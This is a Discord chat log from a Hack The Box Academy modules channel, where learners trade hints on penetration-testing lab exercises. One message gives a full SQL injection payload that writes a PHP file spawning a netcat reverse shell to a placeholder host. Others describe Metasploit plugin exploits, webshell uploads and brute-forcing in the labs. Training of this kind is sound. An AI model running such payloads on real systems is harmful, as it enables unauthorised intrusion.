#modules

1 messages Β· Page 518 of 1

low dirge
#

I would say it is neither easy nor hard. Everything you need to know is included in the modules. It is not one to one though

night zealot
#

Oh I understand, then I guess that I will take note about everything, is it theorical or practice like OSCP?

mortal basin
# night zealot Oh I understand, then I guess that I will take note about everything, is it theo...

The exam is 100% hands-on for a duration of 7 days. You can read more about it here:

https://academy.hackthebox.com/preview/certifications/htb-certified-bug-bounty-hunter/

Certified Bug Bounty Hunter [CBBH] | HTB Academy

Be a certified Bug Bounty Hunter! For those who want to enter the bug bounty hunting world with little to no prior experience. Entry to intermediate-level web application security assessment and bug bounty concepts.

night zealot
#

I really appreciate it, I'm going to take a look thank you!

acoustic owl
worldly reef
#

Anyone here who can give me lil nudge on search foothold?

#

Opps srry wrong place

west canopy
#

@acoustic owl You got this bro!

tight mesa
#

anyone can give me a hint where the flag can be at LFI and File Uploads module?

#

I could upload the webshell but couldn't find the flag

west canopy
#

@tight mesa which section(s) ?

acoustic owl
tight mesa
west canopy
#

@tight mesa check the root directory

#

ls /

tight mesa
#

I did already

west canopy
#

the file name of the flag is a long string of random numbers and letters

tight mesa
#

doesn't work

heady nova
#

without GIF8

tight mesa
#

gotcha

west canopy
#

Yea the GIF8 is just a side effect of the shell we are using.

tight mesa
#

ty guys

dense ferry
#

Could someone give me a tip for the Broken Authentication Skill Assessment? I am logged in as support, but I can't figure out what the next step should be

west canopy
#

Edit: Removing spoilers

dense ferry
lethal atlas
#

Can someone give me a little nudge on the skills assessment of Web Service & API Attacks.

#

I have a root shell, have looked over some files but I cant seem to fuzz any parameters. I have also found credentials for eporter but not sure if that helps

drifting knoll
#

@west canopy @tight mesa guys be careful with spoilers

dense ferry
lethal atlas
sweet heron
#

Quick question. Which service would be faster to crack: ftp, ssh or smb?

fierce atlas
#

for sure not ssh

sweet heron
#

at best on my VM using hals my cpu, ssh gives me 128 tries/min and ftp 272

opaque fiber
#

I am on the windows machine from Junior Pentester > Shell & Payloads > Reverse Shell and pasting the client/target windows 10 Reverse shell command get an error (I changed my ip and also tryed port 4242)

#

oh well base64 works

raven cairn
#

Hello. I would like some help on SQL Injection Fundamentals, section: reading files.

#

I don't know anything about PHP so I am confused what to do, and how to do it.

west canopy
#

@raven cairn DM me πŸ™‚

long bone
#

Could I get any help with the last question of the Active Subdomain Enumeration module in Information Gathering - Web Edition: "Submit the number of all "A" records from all zones as the answer." I assumed that I could get that with a simple "dig a" command within the different zones and just calculate it that way. I feel like an idiot, a nudge would help. Thanks

west canopy
#

@long bone I think I counted all A records from the two zones manually (inlanefreight.htb and xxxxxx.inlanefreight.htb)

long bone
west canopy
#

yep

long bone
sweet heron
#

In file transfer module, why do they use python3 import urllib.request ..... instead of python -m http.server? It's so much easier and faster. Am I missing a point. In the linux section.

west canopy
#

@sweet heron I think because that is using python to download a file from a server. Rather than starting your own HTTP server to host a file

sweet heron
#

yeah they use and url in the example instead of a webserver like I'm doing.

lethal atlas
sweet heron
#

I'm stuck in creds hunting in linux of the password attacks module. I've found nothing for user will. I'm already in with kira.

distant stream
hallow veldt
#

I can't execute id command after running the exploit

#

nvm i forgot to use set payload generic/shell_reverse_tcp

leaden quail
#

hey guys im struggeling with SQLMap Essentials - Bypassing Web Application Protections

#

im using for the tasks what it is explained in the describtion but im not able to find the flags.

#

Any hints?

rustic sage
#

Hi, I'm on WordPress / Skill Assessment and I am stuck with the question about unauthenticated download. I found a vulnerable plugin, I know how to exploit it to download a file, but I don't know what file to download. Any hints?

tacit topaz
sweet heron
distant stream
tacit topaz
#

Can I dm someone who finished wordpress module ?

west canopy
#

@tacit topaz DM me πŸ™‚

#

@rustic sage Try looking on exploit-db, you can find an example proof of concept command

tacit topaz
heady nova
#

Hello, can i have a nudge for SQLi Skill Assessment ?

tacit topaz
rustic sage
#

general question in Using Web Proxies: Repeating Requests. so i found the initial flag. im trying to figure out how to cd into the other directories. any help would be appreciated.

#

using burpsuite

west canopy
#

@rustic sage so you can't really Change Directories, but you can use the ls command to enumerate other directories

#

Because it's not a fully interactive terminal , it's not like you can move around and change your working directory. Any command you make through burp, your working directory will be the web root for the server

rustic sage
#

ahh ok that makes sense.

short lynx
#

Hey, I'm stuck on the final task in the skills assessment of the hashcat module. I've cracked all the hashes and found the most common but apparently it is not right ||frequency of 18|| Anyone know where I have gone wrong?

daring yarrow
#

Hey, can anyone help me with timelapse machine ?

storm shore
#

Hello i am doing the Web requests module, and i am at the "PUT & Delete" section, and i am not sure what i am doing wrong. i am supposed to get a table of contents, but i am getting this error message instead

unknown.png
heady nova
# 
sudo apt update && sudo apt install -y jq
storm shore
heady nova
#

which jq => if no result, not installed πŸ˜„ (or path missconfigured)

tender dock
#

Kudos to @mortal basin for the Intro to Assembly module. Having so much fun with something I didn't touch since uni. Having an issue, though, with the Procedures part -- final question of that part, none of the addresses that appear on top of the stack, stepping through and into Exit appear to be correct. Anyone with a hint on where I am going wrong?

mortal basin
west canopy
#

@short lynx if you are still having problems feel free to DM me πŸ™‚

wild badge
#

Hi everyone! Could somebody please help me with Web Service & API Attacks - Skills Assessment? How to use sqlmap or test for SQLi if the service always hangs?

tired cliff
#

Hi everyone, just wondering if i might be able to get some help on Web Requests - GET section -

The exercise above seems to be broken, as it returns incorrect results. Use the browser devtools to see what is the request it is sending when we search, and use cURL to search for 'flag' and obtain the flag.

I have followed course material to the letter but for some reason i just cant seem to get this question. I am really flying blind on this... I dont think that the course material really explains what we are doing and what we are supposed to do very well. honestly i have gone down this page about 20 times and I still dont know whats going on... where is this flag!!

rare jackal
#

Could I please get some help with Web Services and API module.. ?

tired cliff
raven cairn
#

I need help on SQLMAP essentials, section: Running SQLMAP on an http request, case #3.

Screen_Shot_2022-04-16_at_7.57.14_PM.png
west canopy
#

@raven cairn try settin the cookie id as the injection point

raven cairn
#

Is this what my command would look like?

Screen_Shot_2022-04-16_at_8.00.13_PM.png
#

because this doesnt work : (

west canopy
#

and keep the --cookie like you have it now

#

i think you need to add -u before the target URL as well

raven cairn
#

@west canopy I just got the flag but in a very different way.

tired cliff
#

Ok... another speedbump i am following the instructions in Web Requests - GET section.

We see that the result is sent as a JSON string. To have it properly formatted in JSON format, we can pipe the output to the jq utility, which will format it properly. We will also silent any unneeded cURL output with -s, as follows

I put the following command in 'using the appropriate Server_IP and Port'

curl -s http://<SERVER_IP>:<PORT>/api.php/city/london | jq

and i get this when i initiate it:

bash: jq: command not found
(23) Failed writing body

Am i missing something???

west canopy
#

@tired cliff need to install jq. Try the command: sudo apt install jq

stone jacinth
tired cliff
west canopy
stone jacinth
#

hmm

raven cairn
#

I also need some help on the web requests module, section Zap scanner. I was able to spider and aggressive scan the site. I found || Remote Os Command Injection || . I've been trying to exploit this for a while. How should I do it? I've been trying to enter commands in input boxes, but it doesn't seem to be working.

west canopy
#

@raven cairn DM me πŸ™‚

inner frigate
#

Hi all, I wrote this also on community help, but maybe more relevant here. I am finding 3 questions in the OSINT module impossible to submit correctly, and I posted the summary here, can anyone give me some guidance on it? https://forum.hackthebox.com/t/osint-corporate-recon-impossible-first-question-on-location/255704

Hack The Box :: Forums
Osint - corporate recon - Impossible First Question on Location

Hi all, I am having a SUPER hard time with something I believe simply is not working… but I am reassured by the support is technically feasible… so looking for some input by the community. I am doing the OSINT - Corporate Recon questions, and I am faced with this question: What are the city's coordinates where one of the company's offices, "in...

knotty hemlock
#

Hi, has someone finished the section "Active Directory Search Filters" in the "Activre Directory LDAP" module? I'm stuck at the question "Find the name of an account with a ServicePrincipalName set that is also a member of the Protected Users group. " Found the name of two accounts but neither one is accepted. πŸ₯²

exotic ginkgo
#

I am stuck on Skills Assessment - Web Fuzzing " One of the pages you will identify should say 'You don't have access!'. What is the full page URL?" all of the pages found I try to access are blank or forbidden. I writing generically in an attempt to not share information.

stone jacinth
rustic sage
rustic sage
#

Someone finished the WordPress Skill Assessment? I'm wondering on what file the unauthenticated file download should be done. It's the only question with a hint, but it's quite unclear to me. I tried to MySQL database as the answer but it seems not to be this.

west canopy
#

@rustic sage DM me πŸ™‚

west canopy
#

@knotty hemlock if you still stuck feel free to DM me

south spoke
#

LOPA

#

JUMANJI LICKS IT

#

@half harborYONE ARE U

#

@high zinc HI

high zinc
#

hi

languid dawn
#

Don't drink and discord

devout cliff
#

^

torpid ermine
#

anyone please give me a nudge in file uploads module skill assessment

heady nova
#

Hello, can i have a nudge on Network Enumeration with Nmap - Service Enumeration ?

Impossible to get hold of the flag 😱

livid pier
#

@tender dock Hey you want to pass along any useful info? Ive been stuck on that procedures section for a bit

west canopy
#

@heady nova try connecting to one of the ports using netcat

heady nova
tender dock
rustic sage
#

so im stuck on Using Web Proxies : Repeating Requests

unknown.png
devout cliff
#

i just finished that part, what are you stuck on

rustic sage
#

i cant seem to navigate anywhere

#

i was able to ls and find the initial flag but past that im kinda lost

devout cliff
#

are you using cd ..?

#

or cd in general?

rustic sage
#

no

devout cliff
#

what are you using

rustic sage
#

i used ls to find the flag and cat to open it

devout cliff
#

ok so my suggestion

#

is to enumerate the directory you are in

#

and work from there

#

and i dont mean the files in the directory, i mean the directory itself

rustic sage
#

so i ran the spider and found a robots.txt file but i cant open it

devout cliff
#

nope not gonna be that

#

you just need a much much simpler command

#

linux basic command

#

if you dont know where you are in your own file system what do you use to find out

rustic sage
#

ima take a step back and clear my head for a bit. i may be overthinking this

devout cliff
#

yeah just think of basic terminal commands

rustic sage
#

thanks for the pointers.

devout cliff
#

np

#

if you still cant figure it out soon pm me

west canopy
#

@rustic sage check the root directory

rustic sage
#

i found it. thanks everyone!

west olive
#

hi

#

i am at web requests...

#

could anyone help me with the GET section?

manic zealot
#

guys i need help in information gathering - web edition, Active infrastruture identification section questions. I tried whatweb and got execution expired, tried curl and got timed out, haven't try aquatone yet. I nmapped it and it gives filtered state. I really need a hint.

manic zealot
west olive
#

what do you mean change the search parameter?

manic zealot
#

curl "http://IP:PORT/search.php?search=THINGS"

#

words after question marks are parameters

west olive
#

oh

#

thnks

manic zealot
#

πŸ‘

devout cliff
#

ok why is this part of Using Web Proxies taking this long. im just trying to fuzz for this file via Burp Intruder. i know that its throttled by the free version but couldnt the module just have the file name early in the list? ive gotten up to 250+ requests and still not hitting the .html file

west canopy
#

@devout cliff it should only take about 50 requests before you get a status code of 200

devout cliff
#

notlikethis

#

ok

#

using the wordlist they talk about in the module?

west canopy
#

yea i think its called common.txt or something like that

devout cliff
#

yep. are you still supposed to use a regex to filter out the '.' in the wordlist?

#

ok i found out what i did wrong

#

nvm

#

i tried to target IP/admin instead of having it in the pointer

pearl geyser
#

Hey guys, ive just started playing around with HTB and Kali linux and I had some questions. I am currently on the "System Information" module (first after the introductory) on the SSH connection section. The problem is I closed my PWNBox earlier and since I can only open it once a day I decided to run the moduels on a Kali VM instead. The problem im getting is that when I try to do the SSH command: "ssh htb-student@10.129.176.178" nothing happens. There is no error message, nothing

#

and its strange, it no longer lets me type out commands as the user or anything. Whenever I type its on a blank line, and it doesn't show me my user or directory or anything. Even if i type "exit" nothing happens

devout cliff
#

ctrl+z

pearl geyser
#

oh, ty...

#

any tips as to why it wouldn't be working? Anything you can point me to? Or was the model designed to only be completed via the virtual PWNbox?

devout cliff
#

are you supposed to just be SSHing into the box?

pearl geyser
#

yeah, i believe so. The module provided me with target IP & user along with the password. There are questions to answer once I connect to the taget computer. The only issue is I closed my PWNbox for the day, and I need to wait 24 hours, so i am trying to do them on a Kali VM

devout cliff
#

i think you might need to set up an openvpn first before you can ssh into the box.

#

i havent done that module in awhile

#

what is the name of the module?

pearl geyser
#

Linux Fundamental > System Information

devout cliff
#

ok

pearl geyser
#

Its under "System Information" under "The Shell" in Table of Contents

devout cliff
#

yeah i think you need to set up your openvpn first

#

before you ssh

#

so do that and then try again

#

if you dont know how to do that there should be a tutorial in the academy on how

pearl geyser
#

i appreciate it, ill do some digging around!

devout cliff
#

it should be pretty easy, just download the vpn key that is next to 'cheat sheet' and use that file for your openvpn command

pearl geyser
#

in theory, I should be able to complete this module in a Kali VM, right?

devout cliff
#

yeah i dont see why you couldnt

pearl geyser
#

wicked, cheers

devout cliff
#

although for full disclosure im using parrot security

pearl geyser
#

Yeah, I wasn't too sure where to begin so I found Network Chucks videos and he recommended Kali

#

I can always boot up another VM with parrot

devout cliff
#

i think it will be fine

rustic sage
#

so im trying to run "auxiliary/scanner/http/http_put" and im getting a file doesn't seem to exist. the upload probably failed

unknown.png
#

USING WEB PORXIES: proxying tools

pearl geyser
# devout cliff i think it will be fine

Hmm, so I've managed to get a bit further but I am still unable to connect... I found the VPN key on the module and googled how to setup the VPN connections in Kali but its still giving me this error, not sure why

SSH_not_working_2.PNG
devout cliff
#

ok so you got the vpn set up in another terminal window and its running correct?

pearl geyser
#

I believe so, but i didnt do it in terminal, i used teh gui

SSH_not_working_3.PNG
#

I just uploaded the filed to the built in VPN on Kali (top right of the picture)

devout cliff
#

ok try refreshing your target you are sshing to and try again

#

maybe the box is not working

#

make it give you a new target

pearl geyser
#

ahh kk

#

you are correct! How silly of me haha

#

Thanks again

devout cliff
#

np

devout cliff
rustic sage
west canopy
#

@rustic sage I wasn't able to get the exploit to work either, but you can find the solution to the challenge question just by looking at the Options of the exploit πŸ˜‰

devout cliff
#

i figured this out i just didnt know if he got it yet

#

im trying to figure out something real quick and then can help if you still dont have it

rustic sage
#

ah ok. ill take a look. thanks for the help!

devout cliff
#

i really wish ZAP had a ascii hex encoder

#

built into their fuzzer Q_Q

#

ok what parameters did you set in metasploit

#

you shouldve set your 'use', 'PROXIES', 'RHOST', and 'RPORT'

#

and then run

rustic sage
#

yes

#

rhost was set the the ip i used in the previous exercise as well as rhost. i think that is where i messed up

devout cliff
#

so what i did

#

i used googles dns server

#

so 8.8.8.8 and port 53 respectively

#

and proxied through 127.0.0.1:8080 like it instructs

rustic sage
#

ok will give it a try. i get alittle freaked out doing this stuff on actual websites. so i waas trying to use the one i used prior

devout cliff
#

its not gonna hurt anything. its just a query

#

and its google

rustic sage
#

ok

devout cliff
#

so just make sure all your parameters are set up right

#

and you should be fine

rustic sage
#

ok thannks!! much appreciated!

devout cliff
#

basic toolset path finally done

#

canyoufeelitnowmrkrabs

rare jackal
#

Can I please get some helps with log poisoning part from File inclusion?

slow bluff
sweet heron
#

I'm looking to ssh into a target. I have only access to ftp and I see its ssh priv and public keys, but I can't seem to edit via ftp the authorized_keys (nor put my own file) to add my own key. How does ippsec do it already? I know I saw him do something with ssh-keygen...

west canopy
#

@sweet heron Footprinting Easy lab?

sweet heron
#

No, it was password attacks easy lab. But I figured it out.

#

Ty

rustic sage
#

fuzzing with burp sux...

west canopy
#

@rustic sage Yea it's slow haha

rustic sage
rustic sage
#

Good morning/evening/../../../../night, dont suppose anyone can point me on the right track with the first skills assesment on "attacking common applications" (attempted searching for public exploits, poking around at abusable functions(couldnt find any) attempting to poke jenkins(which obviously didnt feel right) and attempted to look for directories ffuf) 🧐

west canopy
#

@rustic sage DM me πŸ™‚

edgy cedar
#

How it feels like answering module questions

kindred scroll
#

Hello, I am trying to get a reverse shell from a PHP server in SQL Injection fundamentals module. I am using this:

cn' union select "",'<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f"); ?>', "", "" into outfile '/var/www/html/shell.php'--

(I am replacing the IP and Port placeholders ofc).
But it just doesn't work.
Web shell does work but I don't like it

smoky forge
#

Hey guys, from getting started module knowledge check session I tried to upload shell file with js disabled. It works but can't reach to gettingstarted.htb/data/uploads/shell.php%. So I can't get reverse shell. Pls advice me any tips. Thanks!

kindred scroll
#

I would recommend to just use metasploit

#

Or maybe it's a diff submodule lol

#

can you tell me which one you are talking about

smoky forge
kindred scroll
#

So first you have to obtain the plugin information.
Then just search plugin name in msfconsole.
Use the one with unauth in the name, the authenticated one doesn't seem to work.
set rhosts, lhost.
set payload to generic/shell_reverse_tcp.

#

I did something like that

#

All of this is mentioned in prev lessons so it isn't a spoiler πŸ˜„

dry pumice
#

can someone help me with the nmap module at Service Enumeration ? I don't understand how to find the flag...

gloomy sigil
#

Hi, I'm trying to import the provided zip file from AD BloodHound module but I just get "File created from incompatible collector". Can someone help me?

tacit topaz
#

Hi I'm trying to do the skill assessment of the web service and api attacks but i'm a bit stuck can I get some help plz ?

#

Nvm I found the flag !

#

Not with the expected method but I get the flag πŸ˜„

maiden slate
#

Has anyone completed the 'Service Login' portion of the 'Login Brute Forcing' module? I need a little guidance.

lethal atlas
dry pumice
#

Sorry, I found it by myself

lethal atlas
drifting knoll
lethal atlas
maiden slate
#

@lethal atlas Nice job on getting that done bro!

smoky forge
kindred scroll
verbal mirage
#

Hey, I need help with the Assessment of "Broken Authentication". I try to bruteforce the support login. I filtered rockyou.txt with the password requirements. But still cannot find the correct password. Is there anyone who can provide help?

lethal atlas
livid pier
lethal atlas
#

Thanks bro.

molten epoch
#

hey i need help with module Getting started Section Service scanning the question asks me to identify the non default port that the telnet service is running on i understand that i run nmap but i dont understand what im lloking for in the nmap results

lethal atlas
#

what do your nmap results show?

#

feel free to dm me

rustic sage
#

im running intruder attack in burp in the USING WEB PROXIES: BURP INTRUDER: i cant seem to get it to find the admin page . this is the second time ive run the attack the machine runs out of time before the attack is done. any suggestions?

devout cliff
#

DM me

plain cypress
#

Anyone done the Academy module web proxies....specifically repeating requests? I cannot figure out where the flag is..... i have looked through a bunch of directories in /var/ and /var/www/html/public/ cannot find anything

west canopy
#

@plain cypress check the root directory

#

@rustic sage are you running the intruder against: GET /admin/$FUZZ$.html ?

plain cypress
west canopy
west canopy
#

@dry pumice Try connecting to one of the ports with netcat πŸ™‚

plain cypress
west canopy
#

np πŸ™‚

rustic sage
west canopy
#

@rustic sage if you gets stuck feel free to DM me

rustic sage
late beacon
#

Anyone figure these questions out (Attacking Common Applications)?

unknown.png
#

I can't find the flag

west canopy
#

@late beacon Wordpress Discovery and Enumeration?

late beacon
#

Yea that one, I looked in /wp-includes but didn't see it

west canopy
#

DM me πŸ™‚

heavy edge
#

im having issues with the getting started course. specifically the public exploits section. 1) the IP is constantly dropping. i can visit it once and see its a WP page but afterwards it wont come back up. i cant ping it etc 2) which WP exploit do i use. there are like dozens on dozens and i really dont want to try every single one.

#

i know imma newb. pls dont laugh

#

ill try that one thank you

west canopy
#

@heavy edge My posts may have been too spoilery --- if you get stuck feel free to DM me !

acoustic owl
lethal atlas
heavy edge
#

just finished priv escalation

#

if you need help you can ask me for tips

#

gonna run through it a few times to get it down 100%

west canopy
#

Get it big dawg!

broken bronze
#

anbody a hand on assembly module?

manic zealot
#

guys i need help in information gathering - web edition, Active infrastruture identification section questions. I tried whatweb and got execution expired, tried curl and got timed out, haven't try aquatone yet. I nmapped it and it gives filtered state. I really need a hint.

west canopy
#

@manic zealot DM me πŸ™‚

flint helm
#

Hey I'm stuck at File Uploads Skills Assessement I've found a payload that gets through but I don't know where it is stored. I know I should read the source code of upload.php but I don't know how, I can't seem to read it via XXE and I've also read the source code of script.js but it doesn't help either. So I would really appreciate a hint.

west canopy
#

@flint helm DM be brah i got you!

unreal beacon
#

Good evening guys, hope everyone is fine. I'm having difficulty understanding this exercise in the Web Requests module. I found the flag request in the devtool but what should I type in the answer box? Also the png on this section of the module is not working and I didn't had the chance to look at it

Schermata_2022-04-18_alle_22.38.48.png
west canopy
#

@unreal beacon try navigating the flag in your browser, or use CURL from your terminal

unreal beacon
ionic summit
#

Anyone for a sanity check on the final skills assessment on the SQLMap module? I’m having trouble getting the payload right. Thanks!

devout cliff
ionic summit
#

Yes...sorry, left off the Essentials. That's the one.

devout cliff
#

dm me what you got i finished that module

#

see if i can remember what i did

#

OH THIS ONE

#

haha

devout cliff
sweet heron
#

I have a question on medium lab on password attacks. Do I really need to bruteforce ssh with the second user I found? Trying hydra on smb gives me an error "does not support SMBv1"

rustic sage
#

For Host and Port Scanning wihtin Network Enumeration with Nmap , what is the target system IP?

heavy edge
#

got the usr flag on knowledge check for getting started on to the root tomorrow

sweet heron
#

Click the green text: "Click here to spawn the target system!" ...

sweet heron
heavy edge
#

if you need help with the usr flag and half of root lmk i was so close then the machine died so i had to respawn it

sweet heron
rustic sage
rustic sage
heavy edge
#

so you download thr ovpn file

#

and then init it thru terminal

#

udp or tcp which ever u want

rustic sage
#

Yes, but I'd need to edit the config file

#

Does academy HTB support openvpn over TCP? or just UDP?

sweet heron
#

I know you get to choose on the main htb website, but not for academy.

#

I've completed 17 modules and never found out I was using UDP xD

heavy edge
#

why would you need to edit?

#

they support ovpn over tcp

#

you can download a tcp file

rustic sage
#

I see the option. It just wasn't in the module. Sometimes you need to edit the config file for openvpn to change the settings. My campus internet has UDP port 1194 blocked

#

So I need to use openvpn via TCP 443

gloomy sigil
hazy grotto
#

SMTP Footprinting. Anyone available to help?

rustic sage
#

For enumerating the hostname with DNS, which flags should I use? In 'Enumerating with nmap`

sweet heron
#

which module section?

unreal beacon
#

JAVA DEOBFUSCATION

#

First question

sweet heron
#

It's the answer of another question.

#

You're one step ahead πŸ˜‰

unreal beacon
livid pier
#

spoiler?

rustic sage
#

Within Host and Port Scanning in the module Network Enumeration with Nmap, how do you enumerate the hostname? I've tried --resolve-all -R and the -A flag?

west canopy
#

@rustic sage -A should give the hostname πŸ™‚

rustic sage
#

<spoiler>nix-nmap-default</spolier> Is what I get, and it says nmap does not recognize default name

west canopy
#

but that's the answer to the Challenge Question

#

in the section

rustic sage
#

I didn't have it as case sensitive :///

broken bronze
#

anybody can help me with assembly module

hazy grotto
#

Thanks @west canopy

late beacon
#

Anyone figure out the last question for the Attacking Common Applications assessment?

#

I know it has something to do with cgi but I can't find the file

west canopy
#

@late beacon Skill Assessment 1 or 2?

late beacon
#

First

west canopy
#

DM me πŸ™‚

raven cairn
#

@west canopy Can i dm a stupid question?

west canopy
#

sure

#

i might have a stupid answer!

manic ermine
#

Hi, is anyone available to give a nudge on the "Web Attacks" skills assessment? I am a bit stuck

sweet heron
#

Footprinting module, smb. I can't seem to find the custom version of the share (or I can't find the good format to input the answer).

west canopy
#

@sweet heron try connecting with rpcclient and enumerate the shares that way

sweet heron
#

they wanted all the line! Thanks

manic ermine
west canopy
#

@manic ermine try changing the Request type by right clicking in burpsuite πŸ™‚

manic ermine
urban sage
#

@plucky plover No. It's not because you aren't using pwnbox. I did it without yesterday. Unless a VPN key is provided target instances are publicly available.

plucky plover
urban sage
#

Neither should effect it here.

plucky plover
urban sage
#

You should be able to at least connect to the server with that.

plucky plover
urban sage
#

I'd try resetting and then make sure you use the newly assigned IP and port.

plucky plover
#

Ill try that once i try on windows

#

maybe my vm just doesnt have good iternet connection

#

nope same thing

#

ill try getting new ip and port

#

@urban sage it worked, i guess that other port and ip was just bugged

#

thanks alot for the help homie

urban sage
#

fingerguns Excellent. Happy hacking!

sharp citrus
#

anyone done with information gathering

#

can i ask for your help in private

#

i got many questions

hardy kindle
#

uhm can anyone help me out with command injection skills assessments. It is Tiny File manager. Most exploits that I see are for non read only users. I tried everything taught in the modules for command injection

ancient ivy
#

Could someone PM me, i have some issues with 'active subdomain enumeration' in the 'information gathering - web edition' module

ancient ivy
#

i am stuck and i would like to make sure i am understanding correctly

kindred scroll
#

Hello, why is it mandatory to split subnets in x % 2 = 0 amounts ? Why can't I split /24 into /27?

tender dock
# kindred scroll Hello, why is it mandatory to split subnets in x % 2 = 0 amounts ? Why can't I s...

What do you mean? You wouldn't split /24 further?
Where have you read that? I mean, why wouldn't you be able to segment the network in odds?

❯ sipcalc 10.10.10.0/27
-[ipv4 : 10.10.10.0/27] - 0

[CIDR]
Host address            - 10.10.10.0
Host address (decimal)  - 168430080
Host address (hex)      - A0A0A00
Network address         - 10.10.10.0
Network mask            - 255.255.255.224
Network mask (bits)     - 27
Network mask (hex)      - FFFFFFE0
Broadcast address       - 10.10.10.31
Cisco wildcard          - 0.0.0.31
Addresses in network    - 32
Network range           - 10.10.10.0 - 10.10.10.31
Usable range            - 10.10.10.1 - 10.10.10.30
cold marsh
#

hi all, i have an issue with the last question of Web Requests Module.
i have replaced all city_name with 'flag' - then i have deleted all. after this job when i call for /api.php/city/flag the flag does not pop on my console. any hint?

kindred scroll
tender dock
kindred scroll
#

Not an exercise

#

It is a general lesson

#

So I can split a network in 3 subnets?

tender dock
#

Yes, you can. The powers of 2 thingie is adhered to by using /27, btw. You get 32 addresses.

#

I'd suggest using sipcalc/ipcalc to experiment and find what makes and does not make sense when segmenting a network

kindred scroll
#

Yeah I wanted to experiment and I did split a /24 network by 3 on paper and it worked perfectly

#

So I was confused about what they said

tender dock
#

Tends to happen, know the feeling πŸ™‚

kindred scroll
#

Thanks for the help

manic ermine
#

Did you ever get an answer to this?

cold marsh
kindred scroll
# cold marsh anyone can help me?

I actually had a similar issue but I somehow fixed it and then forgot how I did :D. Maybe try renaming a different city or resetting the machine

cold marsh
#

its part of academy, it's impossible to reset it

#

okay.. ill try to wait until the rest

kindred scroll
#

If you did everything correctly and it is indeed a bug you can dm for something πŸ˜„

rancid tide
#

a lot of time is the name the prob

#

*times

cold marsh
rancid tide
strange arrow
#

Hello.. can anyone help me to connect to a windows system using xfreerdp.? I'm trying to complete the Windows Fundamentals Module, but I am unable to connect to the Windows System as mentioned in the exercise

tender dock
tight mesa
#

hello everyone, who can give me a hint with "Server Log Poisoning" under LFI | Path Transversal module, I'm stuck..!!!

#

I'm doing exactly the same was explained in the content but I can't receive the response poisoned from the server once the web shell was sent..!!!

muted rampart
broken bronze
#

Can anyone help on assembly part 2 assessment

arctic torrent
#

Hi

#

I'm stucking in question: How large can our shellcode theoretically become if we count NOPS and the shellcode size together? (Format: 00 Bytes)

#

Here, suggests using msf modules like blabla_pattern.rb

#

But I can't find it

jolly python
#

Anyone completed the bloodhound module that can help. I only have the very last question to go. Find the percentage of users with a path to Domain Admin.

jolly python
#

Nevermind. I finally figured out.

west canopy
#

@arctic torrent just need to add these two numbers together πŸ™‚

unknown.png
strange arrow
#

how to I connect to the Windows Spawn machine with my VM... I've connected through the openvpn, but I am unable to connect the xfreerpd to the IP.

#

it always gives me "faild to connect" error

blissful verge
arctic torrent
#

thanks

#

it's true

mellow whale
lethal atlas
raven cairn
#

The sqlmap section is pretty darn difficult. Could I have some help on case#6 ? (sqlmap essentials attack tuning)

case6.png
#

The hint is to use the prefix ')

#

I've tried quite a bit for a while but I haven't been having luck

twin gulch
#

Can anyone help me with hydra http-post-form ?

lethal atlas
lethal atlas
jagged zenith
heavy edge
#

just finished getting started

#

if you need help lm

#

lmk

mellow whale
serene rain
#

[Broken Authentication - Skill Assessment]
Hello ! I know that some people asked about this exercise but I can't find other account (other than 'support') in using message sender page. I have tried different department name (as office, it, hr etc..) with country code (es, eu, fr etc...) but unable to find a account 😦
My syntax : department.xx
Anybody have an idea please ? πŸ™‚

lethal atlas
serene rain
#

Okay, @jagged zenith helped me in mp, thanks πŸ™‚

serene rain
jagged zenith
#

!rank

frigid summitBOT
hardy kindle
#

Has anyone completed command injection skills assesment that could help me out?

rancid tide
#

guys please help me. In the file inclusion module, Automated Scanning, it tell me to perform a scan with ffuf for find an "expose parameter" for do the task, but ALL the parameter in the file work during the fuzzing, but no one work properly. Am i doing something wrong or there is a prob??

west canopy
#

@rancid tide first you need to fuzz to find out the actual parameter name. And then do a second fuzz for the value πŸ™‚

rancid tide
#

yes

#

but why

#

all the parameter are good

#

I DON'T UNDERSTAND WHY

#

AND NO ONE WORK

west canopy
#

Once you find the parameter name , when you fuzz for the value you will see results with either a size of 1935 or 3309.

#

The ones with size 3309 are valid

#

@hardy kindle DM me πŸ™‚

rancid tide
west canopy
#

@rancid tide if you get stuck feel free to DM

rancid tide
broken bronze
#

Can anyone help with assembly module?

fast timber
#

can anyone give me a hint for the Broken Authentication Module, second question on Weak BruteForce Protections?

manic ermine
#

is anyone able to help me out with the Password Attacks module? The first part on network services asks to identify the user for the service then bruteforce the password. Other than using CME to work through each pass/user combo is there some way to identify the user first more quickly?

west canopy
#

@fast timber you don't actually need to brute force credentoals, just send an HTTP request with the X-Forwarded-For header along with an acceptable IP address

sweet heron
devout cliff
#

in the Information Gathering module, it asks for the admin email contact for venmo.com domain. yet it isnt listed via WHOIS. is there supposed to be another way to find it

lethal atlas
devout cliff
#

its not listed in there. the email that is the answer

lethal atlas
#

dm me

devout cliff
#

nvm got it

#

vpn was blocking the rest of the info

lethal atlas
#

strange but good deal you got it

devout cliff
#

yeah weird

fast timber
#

tried a bunch of stuff already

#

but nothing

manic ermine
broken bronze
#

Can anyone help with assembly

rare jackal
#

Could somoneplease help me with Edit the php.ini file to block system(), then try to execute PHP Code that uses system. Read the /var/log/apache2/error.log file and fill in the blank: system() has been disabled for ________ reasons. from File inclusion part?

west canopy
#

@rare jackal you can actually just google to find he error message πŸ™‚

rare jackal
#

I think i'm very close... thanks i'll message you

devout cliff
#

the absolute first section

sweet trench
#

hello, the first section is the one wich says "introduction"

#

cause its the first section of that module

#

no problem

vestal spruce
#

I might just be dumb but I don't see a "Enumerating GPO" section anywhere

unknown.png
#

In the bloodhound module

rustic sage
#

is there a trick to getting the zap hud to work?

#

i cant interact with the sites

#

it keeps telling me to add the site to the scope i click add and nothing happens.

manic ermine
west canopy
#

@rustic sage I had to use Zap's built in browser to get the HUD to show up

rustic sage
rustic sage
west canopy
#

If you are trying to use zap scanner you can do it without the HUD

rustic sage
#

im "attempting" to use the scanner lol

sweet heron
#

Any hint on brute-forcing attacks' hard box?

frigid summitBOT
#
Roseme#2867 has been warned

Reason: Mass mention

lethal atlas
sweet heron
#

The last one, the hard lab.

lethal atlas
#

which module?

livid pier
#

πŸ˜‚

lethal atlas
livid pier
#

lol

#

people get sections and modules mixed it seems

lethal atlas
#

I cracked Paper today on HTB

west canopy
lethal atlas
#

totally could have been made by Dwight

sweet heron
#

